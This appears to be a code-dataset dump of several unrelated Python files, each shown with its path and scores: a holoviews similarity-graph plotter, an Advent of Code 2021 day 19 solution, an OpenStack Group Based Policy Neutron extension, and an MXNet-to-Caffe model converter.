-------
graph_dict : dict of holoviews.Graph
(molecule, ksize, log2sketchsize) : holoviews.Graph mapping for all
similarity matrices found. To be used by 'draw_holoviews_graphs'
"""
# Strip the final slash because it makes s3 stuff weird
figure_folder = figure_folder.rstrip('/')
iterable = itertools.product(molecules, ksizes, log2sketchsizes)
graph_dict = {}
categories = metadata[color_cols]
for molecule, ksize, log2sketchsize in iterable:
template_kwargs = dict(molecule=molecule, ksize=ksize,
log2sketchsize=log2sketchsize)
sketch_id = sketch_id_template.format(**template_kwargs)
if verbose:
print(sketch_id.replace('-', ": ").replace("_", ", "))
csv = csv_template.format(**template_kwargs)
try:
similarities = pd.read_csv(csv)
except FileNotFoundError:
warnings.warn(f"file {csv} not found")
# File doesn't exist yet
continue
similarities.index = similarities.columns
if verbose:
print(f"\tsimilarities.shape: {similarities.shape}")
title = f"molecule: {molecule}, ksize: {ksize}, " \
f"log2sketchsize: {log2sketchsize}"
if plaidplot:
try:
g = sourmash_utils.plaidplot(similarities,
metric='cosine',
row_categories=categories,
col_categories=categories,
row_palette=palettes,
col_palette=palettes)
g.fig.suptitle(title)
png = f'{figure_folder}/{sketch_id}_plaidplot.png'
savefig(g, png, dpi=150)
except FloatingPointError:
warnings.warn("\tCouldn't compute linkage -- no plaidplot " \
"generated")
graph, pos = build_graph_and_plot(similarities, metadata,
n_neighbors, color_cols, palettes,
figure_folder,
sketch_id, title)
# hv.extension('matplotlib')
graph_hv = hv.Graph.from_networkx(graph, pos)
graph_hv = graph_hv.opts(node_size=10, edge_line_width=1, cmap='Set2',
node_color=dim(groupby),
node_line_color='gray')
bundled = bundle_graph(graph_hv)
# hv.save(bundled, '.pdf', backend='matplotlib')
graph_dict[(molecule, ksize, log2sketchsize)] = bundled
if make_within_groupby_graphs:
# make within-group (e.g. within-species) graphs
for species, df in metadata.groupby(groupby):
data = similarities.loc[df.index, df.index]
figure_prefix = f"{sketch_id}_{species}"
graph_title = f"{title} ({species})"
build_graph_and_plot(
data, df, n_neighbors, color_cols, palettes, figure_folder,
figure_prefix, graph_title)
return graph_dict
def draw_holoviews_graphs(graph_dict):
# use first key to determine default settings
first_key = list(graph_dict.keys())[0]
molecule, ksize, log2sketchsize = first_key
hv.extension('bokeh')
defaults = dict(width=400, height=400, padding=0.1)
hv.opts.defaults(
opts.EdgePaths(**defaults), opts.Graph(**defaults),
opts.Nodes(**defaults))
kdims = [
hv.Dimension(('molecule', "molecule"), default=molecule),
hv.Dimension(('ksize', "k-mer size"), default=ksize),
hv.Dimension(('log2_num_hashes', "$\log_2$ num hashes"),
default=log2sketchsize),
]
kwargs = dict(width=800, height=800, xaxis=None, yaxis=None)
opts.defaults(opts.Nodes(**kwargs), opts.Graph(**kwargs))
kwargs = dict(node_size=10, edge_line_width=1, cmap='Set2',
node_color=dim("species"),
node_line_color='gray', width=600, height=600, xaxis=None,
yaxis=None)
holomap = hv.HoloMap(graph_dict, kdims=kdims)
holomap.opts(opts.Graph(**kwargs))
return holomap | khtools/holoviews.py | import itertools
import warnings
# 3rd-party modules
import holoviews as hv
from holoviews import opts, dim
from holoviews.operation.datashader import datashade, bundle_graph
import networkx as nx
import pandas as pd
# My handwritten modules
from .s3_utils import savefig
from . import knn
from . import sourmash_utils
# don't warn me about too many figures open
import matplotlib.pyplot as plt
plt.rcParams.update({'figure.max_open_warning': 0})
KSIZES = 9, 12, 15, 21
LOG2SKETCHSIZES = 10, 12, 14, 16
MOLECULES = 'dna', 'protein'
COLOR_COLS = ['species', 'cell_label', ]
PALETTES = dict(species='Set2', cell_label='tab20')
SKETCH_ID_TEMPLATE = 'molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}'
N_NEIGHBORS = 5
def build_graph_and_plot(data, metadata, n_neighbors, color_cols, palettes,
figure_folder, figure_prefix, title):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
graph = knn.nearest_neighbor_graph(data, metadata,
n_neighbors=n_neighbors,
color_cols=color_cols,
palettes=palettes)
pos = nx.spring_layout(graph, seed=0)
for label in color_cols:
fig, ax = plt.subplots()
with warnings.catch_warnings():
warnings.simplefilter("ignore")
knn.draw_graph(graph, edge_color='black', label_col=label, pos=pos)
ax.set_title(title)
figure_suffix = f'graph_nneighbors-{n_neighbors}_colorby-{label}'
png = f'{figure_folder}/{figure_prefix}_{figure_suffix}.png'
savefig(fig, png, dpi=150)
return graph, pos
def get_similarity_graphs(csv_template, metadata, figure_folder,
groupby='species', ksizes=KSIZES,
log2sketchsizes=LOG2SKETCHSIZES, molecules=MOLECULES,
sketch_id_template=SKETCH_ID_TEMPLATE,
n_neighbors=N_NEIGHBORS, plaidplot=False,
palettes=PALETTES, color_cols=COLOR_COLS,
verbose=False, make_within_groupby_graphs=False):
"""Read similarity csvs and create holoviews graphs
Parameters
----------
csv_template : str
format-string to insert molecule, ksize, and log2sketchsize values
into to get csv. e.g.:
'similarities_molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}.csv'
metadata : pandas.DataFrame
Sample-by-feature metadata encoding additional information about
samples, such as species, cell type label, or tissue
groupby : str
Which column of the metadata to groupby to get sub-graphs for
ksizes : tuple of int
Which k-mer sizes to look for similarity files for,
default (9, 12, 15, 21)
log2sketchsizes : tuple of int
Which log2 sketch sizes to look for similarity files for,
default (10, 12, 14, 16)
molecules : tuple of str
Which molecules to use, default both 'dna' and 'protein'
sketch_id_template : str
String to use as a unique identifier for the sketch, e.g.
'molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}'
plaidplot : bool
If true, make a clustered heatmap with the sides labeled with the
color_cols
palettes : dict
Column name (must be in 'metadata') to palette name mapping
color_cols : list
Column names in 'metadata' to color by
Returns
-------
graph_dict : dict of holoviews.Graph
(molecule, ksize, log2sketchsize) : holoviews.Graph mapping for all
similarity matrices found. To be used by 'draw_holoviews_graphs'
"""
# Strip the final slash because it makes s3 stuff weird
figure_folder = figure_folder.rstrip('/')
iterable = itertools.product(molecules, ksizes, log2sketchsizes)
graph_dict = {}
categories = metadata[color_cols]
for molecule, ksize, log2sketchsize in iterable:
template_kwargs = dict(molecule=molecule, ksize=ksize,
log2sketchsize=log2sketchsize)
sketch_id = sketch_id_template.format(**template_kwargs)
if verbose:
print(sketch_id.replace('-', ": ").replace("_", ", "))
csv = csv_template.format(**template_kwargs)
try:
similarities = pd.read_csv(csv)
except FileNotFoundError:
warnings.warn(f"file {csv} not found")
# File doesn't exist yet
continue
similarities.index = similarities.columns
if verbose:
print(f"\tsimilarities.shape: {similarities.shape}")
title = f"molecule: {molecule}, ksize: {ksize}, " \
f"log2sketchsize: {log2sketchsize}"
if plaidplot:
try:
g = sourmash_utils.plaidplot(similarities,
metric='cosine',
row_categories=categories,
col_categories=categories,
row_palette=palettes,
col_palette=palettes)
g.fig.suptitle(title)
png = f'{figure_folder}/{sketch_id}_plaidplot.png'
savefig(g, png, dpi=150)
except FloatingPointError:
warnings.warn("\tCouldn't compute linkage -- no plaidplot " \
"generated")
graph, pos = build_graph_and_plot(similarities, metadata,
n_neighbors, color_cols, palettes,
figure_folder,
sketch_id, title)
# hv.extension('matplotlib')
graph_hv = hv.Graph.from_networkx(graph, pos)
graph_hv = graph_hv.opts(node_size=10, edge_line_width=1, cmap='Set2',
node_color=dim(groupby),
node_line_color='gray')
bundled = bundle_graph(graph_hv)
# hv.save(bundled, '.pdf', backend='matplotlib')
graph_dict[(molecule, ksize, log2sketchsize)] = bundled
if make_within_groupby_graphs:
# make within-group (e.g. within-species) graphs
for species, df in metadata.groupby(groupby):
data = similarities.loc[df.index, df.index]
figure_prefix = f"{sketch_id}_{species}"
graph_title = f"{title} ({species})"
build_graph_and_plot(
data, df, n_neighbors, color_cols, palettes, figure_folder,
figure_prefix, graph_title)
return graph_dict
def draw_holoviews_graphs(graph_dict):
# use first key to determine default settings
first_key = list(graph_dict.keys())[0]
molecule, ksize, log2sketchsize = first_key
hv.extension('bokeh')
defaults = dict(width=400, height=400, padding=0.1)
hv.opts.defaults(
opts.EdgePaths(**defaults), opts.Graph(**defaults),
opts.Nodes(**defaults))
kdims = [
hv.Dimension(('molecule', "molecule"), default=molecule),
hv.Dimension(('ksize', "k-mer size"), default=ksize),
hv.Dimension(('log2_num_hashes', "$\log_2$ num hashes"),
default=log2sketchsize),
]
kwargs = dict(width=800, height=800, xaxis=None, yaxis=None)
opts.defaults(opts.Nodes(**kwargs), opts.Graph(**kwargs))
kwargs = dict(node_size=10, edge_line_width=1, cmap='Set2',
node_color=dim("species"),
node_line_color='gray', width=600, height=600, xaxis=None,
yaxis=None)
holomap = hv.HoloMap(graph_dict, kdims=kdims)
holomap.opts(opts.Graph(**kwargs))
return holomap | 0.495117 | 0.297585 |
INPUT_FILE = 'input.txt'
def sin(angle):
angle %= 360
if angle == 0 or angle == 180:
return 0
elif angle == 90:
return 1
elif angle == 270:
return -1
raise ValueError('Only the multiples of the right angle are supported.')
def cos(angle):
return sin(angle + 90)
def rotation_x(angle, vec):
return [
vec[0],
cos(angle) * vec[1] + -sin(angle) * vec[2],
sin(angle) * vec[1] + cos(angle) * vec[2],
]
def rotation_y(angle, vec):
return [
cos(angle) * vec[0] + sin(angle) * vec[2],
vec[1],
-sin(angle) * vec[0] + cos(angle) * vec[2],
]
def rotation_z(angle, vec):
return [
cos(angle) * vec[0] + -sin(angle) * vec[1],
sin(angle) * vec[0] + cos(angle) * vec[1],
vec[2],
]
def rotation_xyz(angle_x, angle_y, angle_z, vec):
return rotation_z(angle_z, rotation_y(angle_y, rotation_x(angle_x, vec)))
def abs(value):
if value >= 0:
return value
else:
return -value
def sign(value):
if value >= 0:
return 1
elif value < 0:
return -1
def main():
with open(INPUT_FILE, 'r') as file:
scanners = file.read().strip().split('\n\n')
for i, scanner in enumerate(scanners):
scanners[i] = [tuple(map(int, line.split(',')))
for line in scanner.split('\n')[1:]]
rotations = set()
transformations = set()
for angle1 in [0, 90, 180, 270]:
for angle2 in [0, 90, 180, 270]:
for angle3 in [0, 90, 180, 270]:
vec = rotation_xyz(angle1, angle2, angle3, [1, 2, 3])
rotations.add(tuple(vec))
for transformation in rotations:
indexes = tuple([abs(component) - 1 for component in transformation])
signs = tuple([sign(component) for component in transformation])
transformations.add((indexes, signs))
known = set(scanners.pop(0)) # first scanner is our origin point (0, 0, 0)
scanner_positions = [(0, 0, 0)]
while scanners:
matched = False
for scanner in scanners:
for transformation in transformations:
indexes, signs = transformation
nx, ny, nz = indexes
s1, s2, s3 = signs
rotated = [(s1 * beacon[nx], s2 * beacon[ny], s3 * beacon[nz])
for beacon in scanner]
for reading in known:
for beacon in rotated:
dx, dy, dz = [b_i - r_i
for b_i, r_i in zip(beacon, reading)]
translated = set([(x - dx, y - dy, z - dz)
for candidate in rotated
for x, y, z in [candidate]])
common_points = known.intersection(translated)
if len(common_points) >= 12:
scanner_position = tuple(
[r_i + -b_i
for b_i, r_i in zip(beacon, reading)]
)
scanner_positions.append(scanner_position)
known = known.union(translated)
matched = True
break
if matched:
break
if matched:
break
if matched:
break
if matched:
scanners.remove(scanner)
else:
print('Went through all, no match – something is wrong!')
break
distances = []
for index, scanner1 in enumerate(scanner_positions):
for scanner2 in scanner_positions[index + 1:]:
L1 = sum([abs(s1_i - s2_i)
for s1_i, s2_i in zip(scanner1, scanner2)])
distances.append(L1)
print(max(distances))
if __name__ == '__main__':
main() | year-2021/day-19/part-2.py |
INPUT_FILE = 'input.txt'
def sin(angle):
angle %= 360
if angle == 0 or angle == 180:
return 0
elif angle == 90:
return 1
elif angle == 270:
return -1
raise ValueError('Only the multiples of the right angle are supported.')
def cos(angle):
return sin(angle + 90)
def rotation_x(angle, vec):
return [
vec[0],
cos(angle) * vec[1] + -sin(angle) * vec[2],
sin(angle) * vec[1] + cos(angle) * vec[2],
]
def rotation_y(angle, vec):
return [
cos(angle) * vec[0] + sin(angle) * vec[2],
vec[1],
-sin(angle) * vec[0] + cos(angle) * vec[2],
]
def rotation_z(angle, vec):
return [
cos(angle) * vec[0] + -sin(angle) * vec[1],
sin(angle) * vec[0] + cos(angle) * vec[1],
vec[2],
]
def rotation_xyz(angle_x, angle_y, angle_z, vec):
return rotation_z(angle_z, rotation_y(angle_y, rotation_x(angle_x, vec)))
def abs(value):
if value >= 0:
return value
else:
return -value
def sign(value):
if value >= 0:
return 1
elif value < 0:
return -1
def main():
with open(INPUT_FILE, 'r') as file:
scanners = file.read().strip().split('\n\n')
for i, scanner in enumerate(scanners):
scanners[i] = [tuple(map(int, line.split(',')))
for line in scanner.split('\n')[1:]]
rotations = set()
transformations = set()
for angle1 in [0, 90, 180, 270]:
for angle2 in [0, 90, 180, 270]:
for angle3 in [0, 90, 180, 270]:
vec = rotation_xyz(angle1, angle2, angle3, [1, 2, 3])
rotations.add(tuple(vec))
for transformation in rotations:
indexes = tuple([abs(component) - 1 for component in transformation])
signs = tuple([sign(component) for component in transformation])
transformations.add((indexes, signs))
known = set(scanners.pop(0)) # first scanner is our origin point (0, 0, 0)
scanner_positions = [(0, 0, 0)]
while scanners:
matched = False
for scanner in scanners:
for transformation in transformations:
indexes, signs = transformation
nx, ny, nz = indexes
s1, s2, s3 = signs
rotated = [(s1 * beacon[nx], s2 * beacon[ny], s3 * beacon[nz])
for beacon in scanner]
for reading in known:
for beacon in rotated:
dx, dy, dz = [b_i - r_i
for b_i, r_i in zip(beacon, reading)]
translated = set([(x - dx, y - dy, z - dz)
for candidate in rotated
for x, y, z in [candidate]])
common_points = known.intersection(translated)
if len(common_points) >= 12:
scanner_position = tuple(
[r_i + -b_i
for b_i, r_i in zip(beacon, reading)]
)
scanner_positions.append(scanner_position)
known = known.union(translated)
matched = True
break
if matched:
break
if matched:
break
if matched:
break
if matched:
scanners.remove(scanner)
else:
print('Went through all, no match – something is wrong!')
break
distances = []
for index, scanner1 in enumerate(scanner_positions):
for scanner2 in scanner_positions[index + 1:]:
L1 = sum([abs(s1_i - s2_i)
for s1_i, s2_i in zip(scanner1, scanner2)])
distances.append(L1)
print(max(distances))
if __name__ == '__main__':
main() | 0.625667 | 0.678806 |
from neutron_lib.api import converters as conv
from neutron_lib.api import extensions
from neutron_lib import constants as nlib_const
from gbpservice.neutron.extensions import group_policy as gp
# Extended attributes for Group Policy resource to map to Neutron constructs
EXTENDED_ATTRIBUTES_2_0 = {
gp.POLICY_TARGETS: {
'port_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'fixed_ips': {'allow_post': True, 'allow_put': True,
'default': nlib_const.ATTR_NOT_SPECIFIED,
'convert_list_to': conv.convert_kvp_list_to_dict,
'validate': {'type:fixed_ips': None},
'enforce_policy': True,
'is_visible': True},
},
gp.POLICY_TARGET_GROUPS: {
'subnets': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
},
gp.L2_POLICIES: {
'network_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
},
gp.L3_POLICIES: {
'address_scope_v4_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'address_scope_v6_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'subnetpools_v4': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
'subnetpools_v6': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
'routers': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
},
gp.EXTERNAL_SEGMENTS: {
'subnet_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
},
gp.NAT_POOLS: {
'subnet_id': {'allow_post': False, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
}
}
class Group_policy_mapping(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return "Group Policy Abstraction Mapping to Neutron Resources"
@classmethod
def get_alias(cls):
return "group-policy-mapping"
@classmethod
def get_description(cls):
return "Extension for Group Policy Abstraction Mapping"
@classmethod
def get_namespace(cls):
return "https://wiki.openstack.org/wiki/Neutron/gp/v2.0/"
@classmethod
def get_updated(cls):
return "2014-03-03T12:00:00-00:00"
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
@classmethod
def get_plugin_interface(cls):
return gp.GroupPolicyPluginBase | gbpservice/neutron/extensions/group_policy_mapping.py |
from neutron_lib.api import converters as conv
from neutron_lib.api import extensions
from neutron_lib import constants as nlib_const
from gbpservice.neutron.extensions import group_policy as gp
# Extended attributes for Group Policy resource to map to Neutron constructs
EXTENDED_ATTRIBUTES_2_0 = {
gp.POLICY_TARGETS: {
'port_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'fixed_ips': {'allow_post': True, 'allow_put': True,
'default': nlib_const.ATTR_NOT_SPECIFIED,
'convert_list_to': conv.convert_kvp_list_to_dict,
'validate': {'type:fixed_ips': None},
'enforce_policy': True,
'is_visible': True},
},
gp.POLICY_TARGET_GROUPS: {
'subnets': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
},
gp.L2_POLICIES: {
'network_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
},
gp.L3_POLICIES: {
'address_scope_v4_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'address_scope_v6_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'subnetpools_v4': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
'subnetpools_v6': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
'routers': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
},
gp.EXTERNAL_SEGMENTS: {
'subnet_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
},
gp.NAT_POOLS: {
'subnet_id': {'allow_post': False, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
}
}
class Group_policy_mapping(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return "Group Policy Abstraction Mapping to Neutron Resources"
@classmethod
def get_alias(cls):
return "group-policy-mapping"
@classmethod
def get_description(cls):
return "Extension for Group Policy Abstraction Mapping"
@classmethod
def get_namespace(cls):
return "https://wiki.openstack.org/wiki/Neutron/gp/v2.0/"
@classmethod
def get_updated(cls):
return "2014-03-03T12:00:00-00:00"
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
@classmethod
def get_plugin_interface(cls):
return gp.GroupPolicyPluginBase | 0.604866 | 0.156491 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import argparse
import caffe
import constants
import logging
import mxnet as mx
import numpy as np
import os
import sys
from caffe import layers
from create_caffe_layers import get_caffe_layer
from parse_mxnet_symbol import MxnetParser
sys.path.append('/incubator-mxnet/example/ssd/tools/caffe_converter')
import caffe_parser # noqa
FORMAT = "[%(filename)s:%(lineno)s - %(funcName)20s() - %(levelname)-5s ] %(message)s"
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger(__name__)
INPUT_DIMS = constants.INPUT_DIMS
class MxNetToCaffe(object):
"""Convert trained model from mxnet to caffe.
Attributes:
caffe_prototxt (str): filename of the caffe prototxt
caffe_weights (str): filename of the caffe weights binary
epoch (str): mxnet epoch number of model to read weights from
net (caffe.net): caffe net object that is constructed
prefix (str): prefix of mxnet model name
"""
def __init__(self, prefix, epoch, caffe_prototxt=None, caffe_weights=None):
self.prefix = prefix
self.epoch = epoch
self.caffe_prototxt = caffe_prototxt if \
caffe_prototxt else 'caffe_models/deploy.prototxt'
self.caffe_weights = caffe_weights if \
caffe_weights else '{}_{}.caffemodel'.format(prefix, epoch)
if not os.path.isdir(os.path.dirname(self.caffe_prototxt)):
os.makedirs(os.path.dirname(self.caffe_prototxt))
self.caffe_net = None
self.convert()
def __parse_network(self):
"""Parse mxnet network and generate corresponding caffe layers.
"""
# Create caffe network
caffe_graph = caffe.NetSpec()
caffe_graph.data = layers.Input(
input_param={'shape': {'dim': [1, 3, INPUT_DIMS[0], INPUT_DIMS[1]]}})
# Assign layers from mxnet
for layer in MxnetParser(self.prefix + '-symbol.json'):
# Note: name needs to be specified explicitly to reconcile differences in mxnet and caffe norm ops.
# In caffe norm includes a scaling parameter, in mxnet these are two consecutive ops.
# So output of the caffe norm op needs to be named based on the scale op name in mxnet.
caffe_layer = get_caffe_layer(layer, caffe_graph, input_dims=INPUT_DIMS)
if layer['type'] == 'L2Normalization':
layer['name'] = 'broadcast_mul0'
if layer['type'] == 'SoftmaxOutput':
layer['name'] = 'cls_prob'
if caffe_layer:
logger.info("Converting {}".format(layer['type']))
caffe_graph[layer['name']] = caffe_layer
else:
logger.info("Skipping {}".format(layer['type']))
logger.info('Writing deploy protoxt file to {}.'.format(self.caffe_prototxt))
with open(self.caffe_prototxt, 'w') as caffe_file:
caffe_file.write(str(caffe_graph.to_proto()))
def __assign_weights(self):
"""Assign learnable network weights.
Network hyper-parameters are assumed to be already set in a previous step.
Raises:
ValueError: Unknown batchnorm convention
"""
# Load caffe prototxt and set up caffe network
self.caffe_net = caffe.Net(self.caffe_prototxt, caffe.TEST)
layer_names = self.caffe_net._layer_names
layers = self.caffe_net.layers
layer_iter = caffe_parser.layer_iter(layers, layer_names)
# Load mxnet model
sym, arg_params, aux_params = mx.model.load_checkpoint(
self.prefix, self.epoch)
first_conv = True
for layer_name, layer_type, layer_blobs in layer_iter:
if layer_type == 'Normalize':
assert len(layer_blobs) == 1
weight_name = [key for key in arg_params.keys()
if key.endswith('_scale')][0]
layer_blobs[0].data[:] = np.squeeze(arg_params[weight_name].asnumpy())
elif layer_type in ('Convolution', 'InnerProduct'):
wmat_dim = list(layer_blobs[0].shape)
weight_name = layer_name + "_weight"
wmat = arg_params[weight_name].asnumpy().reshape(wmat_dim)
channels = wmat_dim[1]
if channels == 3 or channels == 4: # RGB or RGBA
if first_conv:
# Swapping RGB in mxnet into BGR of caffe
wmat[:, [0, 2], :, :] = wmat[:, [2, 0], :, :]
first_conv = False
assert wmat.flags['C_CONTIGUOUS']
logger.info('Converting layer {0}, wmat shape = {1}.'.format(
layer_name, wmat.shape))
if weight_name not in arg_params:
raise ValueError(weight_name + ' not found in arg_params.')
layer_blobs[0].data[:] = wmat
if len(layer_blobs) == 2:
bias_name = layer_name + "_bias"
if bias_name not in arg_params:
raise ValueError(bias_name + ' not found in arg_params.')
bias = arg_params[bias_name].asnumpy()
assert bias.flags['C_CONTIGUOUS']
layer_blobs[1].data[:] = np.squeeze(bias)
logger.info(', bias shape = {}.'.format(bias.shape))
else:
# Layers with no parameters
logger.info('\tSkipping layer {} of type {}'.format(
layer_name, layer_type))
assert len(layer_blobs) == 0
def convert(self):
""" Converts mxnet model to caffe model.
Reads through mxnet symbol definition json file and generates corresponding deploy.prototxt.
Assigns weights from mxnet params file to .caffemodel file.
"""
self.__parse_network()
self.__assign_weights()
logger.info('Saving caffe model in {}'.format(self.caffe_weights))
self.caffe_net.save(self.caffe_weights)
if __name__ == '__main__': # pragma: no cover
parser = argparse.ArgumentParser()
parser.add_argument("prefix", type=str,
help="prefix of mxnet model")
parser.add_argument("epoch", type=int,
help="epoch number of mxnet model")
parser.add_argument("caffe_prototxt", type=str,
help="filename of caffe deploy prototxt")
parser.add_argument("caffemodel_name", type=str,
help="Name of caffe weights file to save")
args = parser.parse_args()
MxNetToCaffe(args.prefix, args.epoch, args.caffe_prototxt, args.caffemodel_name) | mxnet_to_caffe.py |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import argparse
import caffe
import constants
import logging
import mxnet as mx
import numpy as np
import os
import sys
from caffe import layers
from create_caffe_layers import get_caffe_layer
from parse_mxnet_symbol import MxnetParser
sys.path.append('/incubator-mxnet/example/ssd/tools/caffe_converter')
import caffe_parser # noqa
FORMAT = "[%(filename)s:%(lineno)s - %(funcName)20s() - %(levelname)-5s ] %(message)s"
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger(__name__)
INPUT_DIMS = constants.INPUT_DIMS
class MxNetToCaffe(object):
"""Convert trained model from mxnet to caffe.
Attributes:
caffe_prototxt (str): filename of the caffe prototxt
caffe_weights (str): filename of the caffe weights binary
epoch (str): mxnet epoch number of model to read weights from
net (caffe.net): caffe net object that is constructed
prefix (str): prefix of mxnet model name
"""
def __init__(self, prefix, epoch, caffe_prototxt=None, caffe_weights=None):
self.prefix = prefix
self.epoch = epoch
self.caffe_prototxt = caffe_prototxt if \
caffe_prototxt else 'caffe_models/deploy.prototxt'
self.caffe_weights = caffe_weights if \
caffe_weights else '{}_{}.caffemodel'.format(prefix, epoch)
if not os.path.isdir(os.path.dirname(self.caffe_prototxt)):
os.makedirs(os.path.dirname(self.caffe_prototxt))
self.caffe_net = None
self.convert()
def __parse_network(self):
"""Parse mxnet network and generate corresponding caffe layers.
"""
# Create caffe network
caffe_graph = caffe.NetSpec()
caffe_graph.data = layers.Input(
input_param={'shape': {'dim': [1, 3, INPUT_DIMS[0], INPUT_DIMS[1]]}})
# Assign layers from mxnet
for layer in MxnetParser(self.prefix + '-symbol.json'):
# Note: name needs to be specified explicitly to reconcile differences in mxnet and caffe norm ops.
# In caffe norm includes a scaling parameter, in mxnet these are two consecutive ops.
# So output of the caffe norm op needs to be named based on the scale op name in mxnet.
caffe_layer = get_caffe_layer(layer, caffe_graph, input_dims=INPUT_DIMS)
if layer['type'] == 'L2Normalization':
layer['name'] = 'broadcast_mul0'
if layer['type'] == 'SoftmaxOutput':
layer['name'] = 'cls_prob'
if caffe_layer:
logger.info("Converting {}".format(layer['type']))
caffe_graph[layer['name']] = caffe_layer
else:
logger.info("Skipping {}".format(layer['type']))
logger.info('Writing deploy protoxt file to {}.'.format(self.caffe_prototxt))
with open(self.caffe_prototxt, 'w') as caffe_file:
caffe_file.write(str(caffe_graph.to_proto()))
def __assign_weights(self):
"""Assign learnable network weights.
Network hyper-parameters are assumed to be already set in a previous step.
Raises:
ValueError: Unknown batchnorm convention
"""
# Load caffe prototxt and set up caffe network
self.caffe_net = caffe.Net(self.caffe_prototxt, caffe.TEST)
layer_names = self.caffe_net._layer_names
layers = self.caffe_net.layers
layer_iter = caffe_parser.layer_iter(layers, layer_names)
# Load mxnet model
sym, arg_params, aux_params = mx.model.load_checkpoint(
self.prefix, self.epoch)
first_conv = True
for layer_name, layer_type, layer_blobs in layer_iter:
if layer_type == 'Normalize':
assert len(layer_blobs) == 1
weight_name = [key for key in arg_params.keys()
if key.endswith('_scale')][0]
layer_blobs[0].data[:] = np.squeeze(arg_params[weight_name].asnumpy())
elif layer_type in ('Convolution', 'InnerProduct'):
wmat_dim = list(layer_blobs[0].shape)
weight_name = layer_name + "_weight"
wmat = arg_params[weight_name].asnumpy().reshape(wmat_dim)
channels = wmat_dim[1]
if channels == 3 or channels == 4: # RGB or RGBA
if first_conv:
# Swapping RGB in mxnet into BGR of caffe
wmat[:, [0, 2], :, :] = wmat[:, [2, 0], :, :]
first_conv = False
assert wmat.flags['C_CONTIGUOUS']
logger.info('Converting layer {0}, wmat shape = {1}.'.format(
layer_name, wmat.shape))
if weight_name not in arg_params:
raise ValueError(weight_name + ' not found in arg_params.')
layer_blobs[0].data[:] = wmat
if len(layer_blobs) == 2:
bias_name = layer_name + "_bias"
if bias_name not in arg_params:
raise ValueError(bias_name + ' not found in arg_params.')
bias = arg_params[bias_name].asnumpy()
assert bias.flags['C_CONTIGUOUS']
layer_blobs[1].data[:] = np.squeeze(bias)
logger.info(', bias shape = {}.'.format(bias.shape))
else:
# Layers with no parameters
logger.info('\tSkipping layer {} of type {}'.format(
layer_name, layer_type))
assert len(layer_blobs) == 0
def convert(self):
""" Converts mxnet model to caffe model.
Reads through mxnet symbol definition json file and generates corresponding deploy.prototxt.
Assigns weights from mxnet params file to .caffemodel file.
"""
self.__parse_network()
self.__assign_weights()
logger.info('Saving caffe model in {}'.format(self.caffe_weights))
self.caffe_net.save(self.caffe_weights)
if __name__ == '__main__': # pragma: no cover
parser = argparse.ArgumentParser()
parser.add_argument("prefix", type=str,
help="prefix of mxnet model")
